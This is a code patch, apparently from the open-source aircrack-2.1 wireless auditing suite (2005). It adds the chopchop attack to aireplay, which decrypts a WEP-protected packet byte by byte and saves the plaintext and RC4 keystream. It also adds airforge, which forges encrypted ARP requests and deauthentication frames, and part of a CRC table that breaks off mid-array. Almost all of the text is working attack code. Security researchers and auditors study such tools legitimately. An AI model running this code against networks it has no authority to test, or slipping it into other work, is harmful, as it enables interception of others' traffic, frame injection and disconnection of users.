-- if( cnt2++ >= (int) sizeof( arp_packets ) )
-- break;
-+ /* rewrite MAC addresses & frame control */
-+
-+ if( opt.r_fc_0 != -1 ) h80211[0] = opt.r_fc_0;
-+ if( opt.r_fc_1 != -1 ) h80211[1] = opt.r_fc_1;
-+
-+ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
-+
-+ switch( h80211[1] & 3 )
-+ {
-+ case 0: i_bssid = 16; i_smac = 10; i_dmac = 4; break;
-+ case 1: i_bssid = 4; i_smac = 10; i_dmac = 16; break;
-+ case 2: i_bssid = 10; i_smac = 16; i_dmac = 4; break;
-+ default: i_bssid = 4; i_dmac = 16; i_smac = 24; break;
-+ }
-+
-+ if( memcmp( opt.r_bssid, NULL_MAC, 6 ) != 0 )
-+ memcpy( h80211 + i_bssid, opt.r_bssid, 6 );
-+
-+ if( memcmp( opt.r_smac, NULL_MAC, 6 ) != 0 )
-+ memcpy( h80211 + i_smac, opt.r_smac, 6 );
-+
-+ if( memcmp( opt.r_dmac, NULL_MAC, 6 ) != 0 )
-+ memcpy( h80211 + i_dmac, opt.r_dmac, 6 );
-+
-+ /* standard operation mode: loop resending the packet */
-+
-+ memset( ticks, 0, sizeof( ticks ) );
-+
-+ nb_pkt_sent = 0;
-+
-+ while( 1 )
-+ {
-+ if( do_exit )
-+ {
-+ printf( "exiting.\n\n" );
-+ return( 0 );
-+ }
-+
-+ /* wait for the next timer interrupt */
-+
-+ if( read( fd_rtc, &n, sizeof( n ) ) < 0 )
-+ {
-+ perror( "\nread(/dev/rtc)" );
-+ return( 1 );
-+ }
-+
-+ ticks[0]++;
-+ ticks[1]++;
-+ ticks[2]++;
-+
-+ if( ticks[1] == 400 )
-+ {
-+ ticks[1] = 0;
-+ printf( "\rSent %ld packets...\33[K", nb_pkt_sent );
-+ fflush( stdout );
-+ }
-+
-+ if( ( ticks[2] * opt.nbpps ) / 4096 < 1 )
-+ continue;
-+
-+ ticks[2] = 0;
-+
-+ if( send_frame( fd_out, h80211, caplen ) != 0 )
-+ {
-+ if( errno != EAGAIN )
-+ {
-+ perror( "write" );
-+ return( 1 );
-+ }
-+ }
-+ else
-+ nb_pkt_sent++;
- }
-
-- printf( "\r\33[1KRead %ld packets, got %ld "
-- "potential ARP requests.\n", cnt1, cnt2 );
-+ return( 0 );
-+
-+ /* chopchop operation mode: truncate and decrypt the packet */
-+ /* we assume the plaintext starts with AA AA 03 00 00 00 */
-+
-+do_chopchop:
-+
-+ /* backup the packet */
-
-- if( cnt2 == 0 )
-+ if( ( savebuf = (unsigned char *) malloc( pkh.caplen ) ) == NULL )
-+ {
-+ perror( "malloc" );
- return( 1 );
-+ }
-
-- /* now loop sending the ARP packets we've got */
-+ memcpy( savebuf, h80211, pkh.caplen );
-
-- cnt1 = 0;
-+ /* setup the chopping buffer */
-
-- while( cnt2 )
-+ n = pkh.caplen - z + 24;
-+
-+ if( ( chopped = (unsigned char *) malloc( n ) ) == NULL )
- {
-- for( i = 0; i < cnt2; i++ )
-+ perror( "malloc" );
-+ return( 1 );
-+ }
-+
-+ memset( chopped, 0, n );
-+
-+ data_start = z + 4;
-+ data_end = pkh.caplen;
-+
-+ chopped[0] = 0x08; /* normal data frame */
-+ chopped[1] = 0x41; /* WEP = 1, ToDS = 1 */
-+
-+ if( opt.r_fc_0 != -1 ) chopped[0] = opt.r_fc_0;
-+ if( opt.r_fc_1 != -1 ) chopped[1] = opt.r_fc_1;
-+
-+ memcpy( chopped + 4, h80211 + i_bssid, 6 ); /* copy the BSSID */
-+ memcpy( chopped + 24, h80211 + z, 4 ); /* copy the WEP IV */
-+
-+ /* setup the xor mask to hide the original data */
-+
-+ crc_mask = 0;
-+
-+ for( i = data_start; i < data_end - 4; i++ )
-+ {
-+ switch( i - data_start )
- {
-- if( do_exit ) cnt2 = 0;
-+ case 0: chopped[i] = 0xAA ^ 0xE0; break;
-+ case 1: chopped[i] = 0xAA ^ 0xE0; break;
-+ case 2: chopped[i] = 0x03 ^ 0x03; break;
-+ default: chopped[i] = 0x55 ^ ( i & 0xFF ); break;
-+ }
-+
-+ crc_mask = crc_tbl[crc_mask & 0xFF]
-+ ^ ( crc_mask >> 8 )
-+ ^ ( chopped[i] << 24 );
-+ }
-+
-+ for( i = 0; i < 4; i++ )
-+ crc_mask = crc_tbl[crc_mask & 0xFF]
-+ ^ ( crc_mask >> 8 );
-+
-+ chopped[data_end - 4] = crc_mask; crc_mask >>= 8;
-+ chopped[data_end - 3] = crc_mask; crc_mask >>= 8;
-+ chopped[data_end - 2] = crc_mask; crc_mask >>= 8;
-+ chopped[data_end - 1] = crc_mask; crc_mask >>= 8;
-+
-+ for( i = data_start; i < data_end; i++ )
-+ chopped[i] ^= savebuf[i];
-+
-+ data_start += 6; /* skip the SNAP header */
-+
-+ /* if the replay source mac is unspecified, forge one */
-+
-+ if( memcmp( opt.r_smac, NULL_MAC, 6 ) == 0 )
-+ {
-+ is_deauth_mode = 1;
-+
-+ opt.r_smac[0] = 0x00;
-+ opt.r_smac[1] = rand() & 0x3E;
-+ opt.r_smac[2] = rand() & 0xFF;
-+ opt.r_smac[3] = rand() & 0xFF;
-+ opt.r_smac[4] = rand() & 0xFF;
-+
-+ memcpy( opt.r_dmac, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
-+ }
-+ else
-+ {
-+ is_deauth_mode = 0;
-
-- if( time( NULL ) - tm_prev >= 1 )
-+ opt.r_dmac[0] = 0xFF;
-+ opt.r_dmac[1] = rand() & 0xFE;
-+ opt.r_dmac[2] = rand() & 0xFF;
-+ opt.r_dmac[3] = rand() & 0xFF;
-+ opt.r_dmac[4] = rand() & 0xFF;
-+ }
-+
-+ /* let's go chopping */
-+
-+ memset( ticks, 0, sizeof( ticks ) );
-+
-+ nb_pkt_read = 0;
-+ nb_pkt_sent = 0;
-+
-+ tt = time( NULL );
-+
-+ guess = 256;
-+
-+ alarm( 15 );
-+
-+ signal( SIGALRM, sighandler );
-+
-+ if( fcntl( fd_in, F_SETFL, O_NONBLOCK ) < 0 )
-+ {
-+ perror( "fcntl(O_NONBLOCK)" );
-+ return( 1 );
-+ }
-+
-+ while( data_end > data_start )
-+ {
-+ if( do_exit == 1 )
-+ {
-+ printf( "exiting.\n\n" );
-+ return( 1 );
-+ }
-+
-+ if( do_exit == 2 )
-+ {
-+ printf( "\n\nThe chopchop attack appears to have failed. "
-+ "Possible reasons:\n\n * Something is wrong with "
-+ "the driver or the wireless card itself.\n * You "
-+ "are too far from the AP. Get closer or reduce the "
-+ "send rate." );
-+
-+ if( is_deauth_mode )
-+ printf( "\n * The AP isn't vulnerable when operating in "
-+ "non-authenticated mode.\n Run aireplay in "
-+ "authenticated mode instead (-h option).\n\n" );
-+ else
-+ printf( "\n * The client MAC you have specified "
-+ "is not currently authenticated."
-+ "\n * The AP isn't vulnerable when operating in "
-+ "authenticated mode.\n Run aireplay in non-"
-+ "authenticated mode instead (no -h option).\n\n" );
-+ return( 1 );
-+ }
-+
-+ /* wait for the next timer interrupt */
-+
-+ if( read( fd_rtc, &n, sizeof( n ) ) < 0 )
-+ {
-+ perror( "read(/dev/rtc)" );
-+ return( 1 );
-+ }
-+
-+ ticks[0]++; /* ticks since we entered the while loop */
-+ ticks[1]++; /* ticks since the last status line update */
-+ ticks[2]++; /* ticks since the last frame was sent */
-+ ticks[3]++; /* ticks since started chopping current byte */
-+
-+ /* update the status line */
-+
-+ if( ticks[1] == 400 )
-+ {
-+ ticks[1] = 0;
-+ printf( "\rSent %3ld packets, current guess: %02X...\33[K",
-+ nb_pkt_sent, guess );
-+ fflush( stdout );
-+ }
-+
-+ if( data_end == 40 && ticks[3] > 8 * ( ticks[0] - ticks[3] ) /
-+ (int) ( pkh.caplen - ( data_end - 1 ) ) )
-+ {
-+ printf( "\n\nThe AP appears to drop packets shorter "
-+ "than 40 bytes.\n" );
-+
-+ h80211 = buffer;
-+
-+ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
-+
-+ if( ( chopped[data_end + 0] ^ savebuf[data_end + 0] ) == 0x06 &&
-+ ( chopped[data_end + 1] ^ savebuf[data_end + 1] ) == 0x04 &&
-+ ( chopped[data_end + 2] ^ savebuf[data_end + 2] ) == 0x00 )
- {
-- tm_prev = time( NULL );
-- printf( "\r\33[1KSent %ld packets\r", cnt1 );
-- fflush( stdout );
-+ printf( "Enabling standard workaround: "
-+ "ARP header re-creation.\n" );
-+
-+ chopped[z + 10] = savebuf[z + 10] ^ 0x08;
-+ chopped[z + 11] = savebuf[z + 11] ^ 0x06;
-+ chopped[z + 12] = savebuf[z + 12] ^ 0x00;
-+ chopped[z + 13] = savebuf[z + 13] ^ 0x01;
-+ chopped[z + 14] = savebuf[z + 14] ^ 0x08;
-+ chopped[z + 15] = savebuf[z + 15] ^ 0x00;
- }
-+ else
-+ {
-+ printf( "Enabling standard workaround: "
-+ " IP header re-creation.\n" );
-+
-+ n = pkh.caplen - ( z + 16 );
-
-- n = arp_packets[i].length;
-+ chopped[z + 4] = savebuf[z + 4] ^ 0xAA;
-+ chopped[z + 5] = savebuf[z + 5] ^ 0xAA;
-+ chopped[z + 6] = savebuf[z + 6] ^ 0x03;
-+ chopped[z + 7] = savebuf[z + 7] ^ 0x00;
-+ chopped[z + 8] = savebuf[z + 8] ^ 0x00;
-+ chopped[z + 9] = savebuf[z + 9] ^ 0x00;
-+ chopped[z + 10] = savebuf[z + 10] ^ 0x08;
-+ chopped[z + 11] = savebuf[z + 11] ^ 0x00;
-+ chopped[z + 14] = savebuf[z + 14] ^ ( n >> 8 );
-+ chopped[z + 15] = savebuf[z + 15] ^ ( n & 0xFF );
-+
-+ memcpy( buffer, savebuf, pkh.caplen );
-+
-+ for( i = z + 4; i < (int) pkh.caplen; i++ )
-+ h80211[i - 4] = h80211[i] ^ chopped[i];
-+
-+ /* sometimes the header length or the tos field vary */
-+
-+ for( i = 0; i < 16; i++ )
-+ {
-+ h80211[z + 8] = 0x40 + i;
-+ chopped[z + 12] = savebuf[z + 12] ^ ( 0x40 + i );
-+
-+ for( j = 0; j < 256; j++ )
-+ {
-+ h80211[z + 9] = j;
-+ chopped[z + 13] = savebuf[z + 13] ^ j;
-+
-+ if( check_crc_buf( h80211 + z, pkh.caplen - z - 8 ) )
-+ goto have_crc_match;
-+ }
-+ }
-
-- if( write( raw_sock, arp_packets[i].data, n ) != n )
-+ printf( "This doesn't look like an IP packet, "
-+ "try another one.\n" );
-+
-+ }
-+
-+ have_crc_match:
-+ break;
-+ }
-+
-+ if( ( ticks[2] * opt.nbpps ) / 4096 > 0 )
-+ {
-+ /* send one modified frame */
-+
-+ ticks[2] = 0;
-+
-+ memcpy( buffer, chopped, data_end - 1 );
-+
-+ /* note: guess 256 is special, it tests if the *
-+ * AP properly drops frames with an invalid ICV *
-+ * so this guess always has its bit 8 set to 0 */
-+
-+ if( is_deauth_mode )
- {
-- perror( "write" );
-+ opt.r_smac[1] |= ( guess < 256 );
-+ opt.r_smac[5] = guess & 0xFF;
-+ }
-+ else
-+ {
-+ opt.r_dmac[1] |= ( guess < 256 );
-+ opt.r_dmac[5] = guess & 0xFF;
-+ }
-+
-+ memcpy( buffer + 10, opt.r_smac, 6 );
-+ memcpy( buffer + 16, opt.r_dmac, 6 );
-+
-+ if( guess < 256 )
-+ {
-+ buffer[data_end - 2] ^= crc_chop_tbl[guess][3];
-+ buffer[data_end - 3] ^= crc_chop_tbl[guess][2];
-+ buffer[data_end - 4] ^= crc_chop_tbl[guess][1];
-+ buffer[data_end - 5] ^= crc_chop_tbl[guess][0];
-+ }
-+
-+ if( send_frame( fd_out, buffer, data_end -1 ) != 0 )
-+ {
-+ if( errno != EAGAIN )
-+ {
-+ perror( "write" );
-+ return( 1 );
-+ }
-+ }
-+ else
-+ {
-+ nb_pkt_sent++;
-+ if( ++guess > 256 ) guess = 0;
-+ }
-+ }
-+
-+ /* watch for a response from the AP */
-+
-+ memset( buffer, 0, 2048 );
-+
-+ if( ( caplen = read( fd_in, buffer,
-+ sizeof( buffer ) ) ) < 0 )
-+ {
-+ if( errno == EAGAIN ) continue;
-+ perror( "read" );
-+ return( 1 );
-+ }
-+
-+ /* if device is an atheros, remove the FCS */
-+
-+ if( memcmp( argv[argc - 1], "ath", 3 ) == 0 )
-+ caplen -= 4;
-+
-+ nb_pkt_read++;
-+
-+ /* skip the prism header if present */
-+
-+ h80211 = buffer;
-+
-+ if( arptype_in == ARPHRD_IEEE80211_PRISM )
-+ {
-+ n = *(int *)( buffer + 4 );
-+
-+ if( n < 8 || n >= (int) caplen )
-+ continue;
-+
-+ h80211 += n;
-+ caplen -= n;
-+ }
-+
-+ /* check if it's a deauthentication packet */
-+
-+ if( h80211[0] == 0xC0 )
-+ {
-+ if( memcmp( h80211 + 4, opt.r_smac, 6 ) == 0 &&
-+ ! is_deauth_mode )
-+ {
-+ printf( "\rThe client's source MAC you have specified "
-+ "does not appear to\nbe authenticated (got a "
-+ "deauthentication packet from the AP).\n\n" );
-+ return( 1 );
-+ }
-+
-+ if( h80211[4] != opt.r_smac[0] ) continue;
-+ if( h80211[6] != opt.r_smac[2] ) continue;
-+ if( h80211[7] != opt.r_smac[3] ) continue;
-+ if( h80211[8] != opt.r_smac[4] ) continue;
-+
-+ if( ( h80211[5] & 0xFE ) !=
-+ ( opt.r_smac[1] & 0xFE ) ) continue;
-+
-+ if( ! ( h80211[5] & 1 ) )
-+ {
-+ printf( "\rThe Access Point does not appear to properly "
-+ "discard frames with an\ninvalid ICV - try running "
-+ "aireplay in authenticated mode (-h) instead.\n\n" );
-+ return( 1 );
-+ }
-+ }
-+ else
-+ {
-+ if( is_deauth_mode )
-+ continue;
-+
-+ /* check if it's a WEP data packet */
-+
-+ if( ( h80211[0] & 0x0C ) != 8 ) continue;
-+ if( ( h80211[0] & 0xF0 ) != 0 ) continue;
-+ if( ( h80211[1] & 0x03 ) != 2 ) continue;
-+ if( ( h80211[1] & 0x40 ) == 0 ) continue;
-+
-+ /* check the extended IV (TKIP) flag */
-+
-+ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
-+
-+ if( ( h80211[z + 3] & 0x20 ) != 0 ) continue;
-+
-+ /* check the destination address */
-+
-+ if( h80211[4] != opt.r_dmac[0] ) continue;
-+ if( h80211[6] != opt.r_dmac[2] ) continue;
-+ if( h80211[7] != opt.r_dmac[3] ) continue;
-+ if( h80211[8] != opt.r_dmac[4] ) continue;
-+
-+ if( ( h80211[5] & 0xFE ) !=
-+ ( opt.r_dmac[1] & 0xFE ) ) continue;
-+
-+ if( ! ( h80211[5] & 1 ) )
-+ {
-+ printf( "\nThe Access Point does not appear to properly "
-+ "discard frames with an\ninvalid ICV - try running "
-+ "aireplay in non-authenticated mode instead.\n\n" );
- return( 1 );
- }
-+ }
-+
-+ /* we have a winner */
-+
-+ guess = h80211[9];
-+
-+ chopped[data_end - 1] ^= guess;
-+ chopped[data_end - 2] ^= crc_chop_tbl[guess][3];
-+ chopped[data_end - 3] ^= crc_chop_tbl[guess][2];
-+ chopped[data_end - 4] ^= crc_chop_tbl[guess][1];
-+ chopped[data_end - 5] ^= crc_chop_tbl[guess][0];
-+
-+ n = pkh.caplen - data_start;
-
-- cnt1++;
-+ printf( "\rOffset %4d (%2d%% done) | xor = %02X | pt = %02X | "
-+ "%4ld frames written in %5ldms\n", data_end - 1,
-+ 100 * ( pkh.caplen - data_end ) / n,
-+ chopped[data_end - 1],
-+ chopped[data_end - 1] ^ savebuf[data_end - 1],
-+ nb_pkt_sent, ( 1000 * ticks[3] ) / 4096 );
-+
-+ nb_pkt_sent = ticks[3] = 0;
-+
-+ guess = 256;
-+
-+ if( is_deauth_mode )
-+ {
-+ opt.r_smac[1] = rand() & 0x3E;
-+ opt.r_smac[2] = rand() & 0xFF;
-+ opt.r_smac[3] = rand() & 0xFF;
-+ opt.r_smac[4] = rand() & 0xFF;
- }
-+ else
-+ {
-+ opt.r_dmac[1] = rand() & 0xFE;
-+ opt.r_dmac[2] = rand() & 0xFF;
-+ opt.r_dmac[3] = rand() & 0xFF;
-+ opt.r_dmac[4] = rand() & 0xFF;
-+ }
-+
-+ data_end--;
-+
-+ alarm( 0 );
- }
-
-- printf( "\r\33[1KSent %ld packets.\n", cnt1 );
-+ /* reveal the plaintext (chopped contains the prga) */
-+
-+ h80211 = savebuf;
-+
-+ z = ( ( h80211[1] & 3 ) != 3 ) ? 24 : 30;
-+
-+ chopped[z + 4] = savebuf[z + 4] ^ 0xAA;
-+ chopped[z + 5] = savebuf[z + 5] ^ 0xAA;
-+ chopped[z + 6] = savebuf[z + 6] ^ 0x03;
-+ chopped[z + 7] = savebuf[z + 7] ^ 0x00;
-+ chopped[z + 8] = savebuf[z + 8] ^ 0x00;
-+ chopped[z + 9] = savebuf[z + 9] ^ 0x00;
-+
-+ for( i = z + 4; i < (int) pkh.caplen; i++ )
-+ h80211[i - 4] = h80211[i] ^ chopped[i];
-+
-+ if( ! check_crc_buf( h80211 + z, pkh.caplen - z - 8 ) )
-+ printf( "\nWarning: ICV checksum verification FAILED!\n" );
-+
-+ pkh.caplen -= 4 + 4; /* remove the WEP IV & CRC (ICV) */
-+ pkh.len -= 4 + 4;
-+
-+ h80211[1] &= 0xBF; /* remove the WEP bit, too */
-+
-+ /* save the decrypted packet */
-+
-+ sprintf( tmp_str, "replay_dec-%02d%02d%02d-%02d%02d%02d.cap",
-+ lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
-+ lt->tm_hour, lt->tm_min, lt->tm_sec );
-+
-+ printf( "\nSaving plaintext in %s\n", tmp_str );
-+
-+ if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
-+ {
-+ perror( "fopen(output pcap,wb+)" );
-+ return( 1 );
-+ }
-+
-+ n = sizeof( struct pcap_file_header );
-+
-+ if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
-+ {
-+ perror( "fwrite(pcap file header)" );
-+ return( 1 );
-+ }
-+
-+ n = sizeof( pkh );
-+
-+ if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
-+ {
-+ perror( "fwrite(packet header)" );
-+ return( 1 );
-+ }
-+
-+ n = pkh.caplen;
-+
-+ if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
-+ {
-+ perror( "fwrite(packet data)" );
-+ return( 1 );
-+ }
-+
-+ /* save the RC4 xor mask (prga) */
-+
-+ sprintf( tmp_str, "replay_dec-%02d%02d%02d-%02d%02d%02d.xor",
-+ lt->tm_year - 100, 1 + lt->tm_mon, lt->tm_mday,
-+ lt->tm_hour, lt->tm_min, lt->tm_sec );
-+
-+ printf( "Saving keystream in %s\n", tmp_str );
-+
-+ if( ( f_cap_out = fopen( tmp_str, "wb+" ) ) == NULL )
-+ {
-+ perror( "fopen(output prga,wb+)" );
-+ return( 1 );
-+ }
-+
-+ n = pkh.caplen + 8 - z;
-+
-+ if( fwrite( chopped + z, 1, n, f_cap_out ) != (size_t) n )
-+ {
-+ perror( "fwrite(prga data)" );
-+ return( 1 );
-+ }
-+
-+ printf( "\nCompleted in %lds (%0.2f bytes/s)\n\n",
-+ time( NULL ) - tt,
-+ (float) ( pkh.caplen - 6 - z ) /
-+ (float) ( time( NULL ) - tt ) );
-+
-+ /* that's all, folks */
-
- return( 0 );
- }
-diff -urN aircrack-2.1.orig/airforge.c aircrack-2.1/airforge.c
---- aircrack-2.1.orig/airforge.c 1970-01-01 01:00:00.000000000 +0100
-+++ aircrack-2.1/airforge.c 2005-04-22 08:51:21.933064968 +0200
-@@ -0,0 +1,267 @@
-+/*
-+ * 802.11 ARP-request & deauthentication frame forgery
-+ *
-+ * Copyright (C) 2005 Christophe Devine
-+ *
-+ * This program is free software; you can redistribute it and/or modify
-+ * it under the terms of the GNU General Public License as published by
-+ * the Free Software Foundation; either version 2 of the License, or
-+ * (at your option) any later version.
-+ *
-+ * This program is distributed in the hope that it will be useful,
-+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
-+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-+ * GNU General Public License for more details.
-+ *
-+ * You should have received a copy of the GNU General Public License
-+ * along with this program; if not, write to the Free Software
-+ * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
-+ */
-+
-+#include <arpa/inet.h>
-+#include <string.h>
-+#include <stdlib.h>
-+#include <stdio.h>
-+
-+#include "pcap-aireplay.h"
-+#include "crctable.h"
-+
-+#define ARP_REQ \
-+ "\x08\x40\x02\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
-+ "\xFF\xFF\xFF\xFF\xFF\xFF\x80\x01\x55\x55\x55\x55\xAA\xAA\x03\x00" \
-+ "\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01\xCC\xCC\xCC\xCC" \
-+ "\xCC\xCC\x11\x11\x11\x11\x00\x00\x00\x00\x00\x00\x22\x22\x22\x22" \
-+ "\x00\x00\x00\x00"
-+
-+#define DEAUTH_REQ \
-+ "\xC0\x00\x02\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \
-+ "\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"
-+
-+char usage[] =
-+
-+"\n"
-+" airforge 2.2 - (C) 2005 Christophe Devine\n"
-+"\n"
-+" usage 1: arp-request forgery\n"
-+"\n"
-+" arpforge <prga file> <type> <bssid> <mac src>\n"
-+" <ip src> <ip dst> <output filename>\n"
-+"\n"
-+" usage 2: deauthentication frame forgery\n"
-+"\n"
-+" arpforge <bssid> <dst mac> <output filename>\n"
-+"\n";
-+
-+int getmac( char *s, unsigned char *mac )
-+{
-+ int i = 0, n;
-+
-+ while( sscanf( s, "%x", &n ) == 1 )
-+ {
-+ if( n < 0 || n > 255 )
-+ return( 1 );
-+
-+ mac[i] = n;
-+
-+ if( ++i == 6 ) break;
-+
-+ if( ! ( s = strchr( s, ':' ) ) )
-+ break;
-+
-+ s++;
-+ }
-+
-+ return( i != 6 );
-+}
-+
-+int main( int argc, char *argv[] )
-+{
-+ int n;
-+ unsigned long int crc;
-+ FILE *f_prga, *f_cap_out;
-+
-+ unsigned char h80211[128];
-+ unsigned char bssid[6];
-+ unsigned char saddr[6];
-+ unsigned char daddr[6];
-+ unsigned char ipsrc[4];
-+ unsigned char ipdst[4];
-+ unsigned char prga[44];
-+
-+ struct pcap_file_header pfh;
-+ struct pcap_pkthdr pkh;
-+ struct timeval tv;
-+
-+ if( argc == 4 )
-+ goto forge_deauth;
-+
-+ if( argc != 8 )
-+ {
-+ printf( usage );
-+ return( 1 );
-+ }
-+
-+ if( ( f_prga = fopen( argv[1], "rb" ) ) == NULL )
-+ {
-+ perror( "fopen(input prga,rb)" );
-+ return( 1 );
-+ }
-+
-+ memcpy( h80211, ARP_REQ, pkh.caplen = 68 );
-+
-+ n = atoi( argv[2] );
-+
-+ if( n != 1 && n != 2 )
-+ {
-+ fprintf( stderr, "Invalid type: must be 1 "
-+ "(ToDS) or 2 (FromDS).\n" );
-+ return( 1 );
-+ }
-+
-+ h80211[1] |= n;
-+
-+ if( getmac( argv[3], bssid ) != 0 )
-+ {
-+ fprintf( stderr, "Invalid BSSID.\n" );
-+ return( 1 );
-+ }
-+
-+ if( getmac( argv[4], saddr ) != 0 )
-+ {
-+ fprintf( stderr, "Invalid source MAC.\n" );
-+ return( 1 );
-+ }
-+
-+ memcpy( daddr, "\xFF\xFF\xFF\xFF\xFF\xFF", 6 );
-+
-+ if( ! inet_aton( argv[5], (struct in_addr *) ipsrc ) )
-+ {
-+ fprintf( stderr, "Invalid source IP.\n" );
-+ return( 1 );
-+ }
-+
-+ if( ! inet_aton( argv[6], (struct in_addr *) ipdst ) )
-+ {
-+ fprintf( stderr, "Invalid destination IP.\n" );
-+ return( 1 );
-+ }
-+
-+ if( n == 1 )
-+ {
-+ memcpy( h80211 + 4, bssid, 6 );
-+ memcpy( h80211 + 10, saddr, 6 );
-+ memcpy( h80211 + 16, daddr, 6 );
-+ }
-+
-+ if( n == 2 )
-+ {
-+ memcpy( h80211 + 10, bssid, 6 );
-+ memcpy( h80211 + 16, saddr, 6 );
-+ memcpy( h80211 + 4, daddr, 6 );
-+ }
-+
-+ memcpy( h80211 + 44, saddr, 6 );
-+ memcpy( h80211 + 50, ipsrc, 4 );
-+ memcpy( h80211 + 60, ipdst, 4 );
-+
-+ /* XXX: this source code lacks comments */
-+
-+ crc = 0xFFFFFFFF;
-+
-+ for( n = 28; n < 64; n++ )
-+ crc = crc_tbl[(crc ^ h80211[n]) & 0xFF] ^ (crc >> 8);
-+
-+ crc = ~crc;
-+
-+ h80211[64] = (crc ) & 0xFF;
-+ h80211[65] = (crc >> 8) & 0xFF;
-+ h80211[66] = (crc >> 16) & 0xFF;
-+ h80211[67] = (crc >> 24) & 0xFF;
-+
-+ if( fread( prga, 44, 1, f_prga ) != 1 )
-+ {
-+ fprintf( stderr, "fread(44 bytes) failed - prga too short ?\n" );
-+ return( 1 );
-+ }
-+
-+ memcpy( h80211 + 24, prga, 4 );
-+
-+ for( n = 28; n < 68; n++ )
-+ h80211[n] ^= prga[n - 24];
-+
-+ n = 7;
-+
-+ goto write_packet;
-+
-+forge_deauth:
-+
-+ memcpy( h80211, DEAUTH_REQ, pkh.caplen = 26 );
-+
-+ if( getmac( argv[1], bssid ) != 0 )
-+ {
-+ fprintf( stderr, "Invalid BSSID.\n" );
-+ return( 1 );
-+ }
-+
-+ if( getmac( argv[2], daddr ) != 0 )
-+ {
-+ fprintf( stderr, "Invalid destination MAC.\n" );
-+ return( 1 );
-+ }
-+
-+ memcpy( h80211 + 4, daddr, 6 );
-+ memcpy( h80211 + 10, bssid, 6 );
-+ memcpy( h80211 + 16, bssid, 6 );
-+
-+ n = 3;
-+
-+write_packet:
-+
-+ if( ( f_cap_out = fopen( argv[n], "wb+" ) ) == NULL )
-+ {
-+ fprintf( stderr, "failed: fopen(%s,wb+)\n", argv[7] );
-+ return( 1 );
-+ }
-+
-+ pfh.magic = TCPDUMP_MAGIC;
-+ pfh.version_major = PCAP_VERSION_MAJOR;
-+ pfh.version_minor = PCAP_VERSION_MINOR;
-+ pfh.thiszone = 0;
-+ pfh.sigfigs = 0;
-+ pfh.snaplen = 65535;
-+ pfh.linktype = LINKTYPE_IEEE802_11;
-+
-+ n = sizeof( struct pcap_file_header );
-+
-+ if( fwrite( &pfh, 1, n, f_cap_out ) != (size_t) n )
-+ {
-+ fprintf( stderr, "failed: fwrite(pcap file header)\n" );
-+ return( 1 );
-+ }
-+
-+ gettimeofday( &tv, NULL );
-+
-+ pkh.tv_sec = tv.tv_sec;
-+ pkh.tv_usec = tv.tv_usec;
-+ pkh.len = pkh.caplen;
-+
-+ n = sizeof( pkh );
-+
-+ if( fwrite( &pkh, 1, n, f_cap_out ) != (size_t) n )
-+ {
-+ fprintf( stderr, "fwrite(packet header) failed\n" );
-+ return( 1 );
-+ }
-+
-+ n = pkh.caplen;
-+
-+ if( fwrite( h80211, 1, n, f_cap_out ) != (size_t) n )
-+ {
-+ fprintf( stderr, "fwrite(packet data) failed\n" );
-+ return( 1 );
-+ }
-+
-+ printf( "Done.\n" );
-+
-+ return( 0 );
-+}
-diff -urN aircrack-2.1.orig/crctable.h aircrack-2.1/crctable.h
---- aircrack-2.1.orig/crctable.h 1970-01-01 01:00:00.000000000 +0100
-+++ aircrack-2.1/crctable.h 2005-04-22 08:51:21.934064816 +0200
-@@ -0,0 +1,108 @@
-+#ifndef _CRCTABLE_H
-+#define _CRCTABLE_H
-+
-+const unsigned long int crc_tbl[256] =
-+{
-+ 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3,
-+ 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91,
-+ 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7,
-+ 0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5,
-+ 0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B,
-+ 0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59,
-+ 0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F,
-+ 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924, 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D,
-+ 0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433,
-+ 0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01,
-+ 0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457,
-+ 0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65,
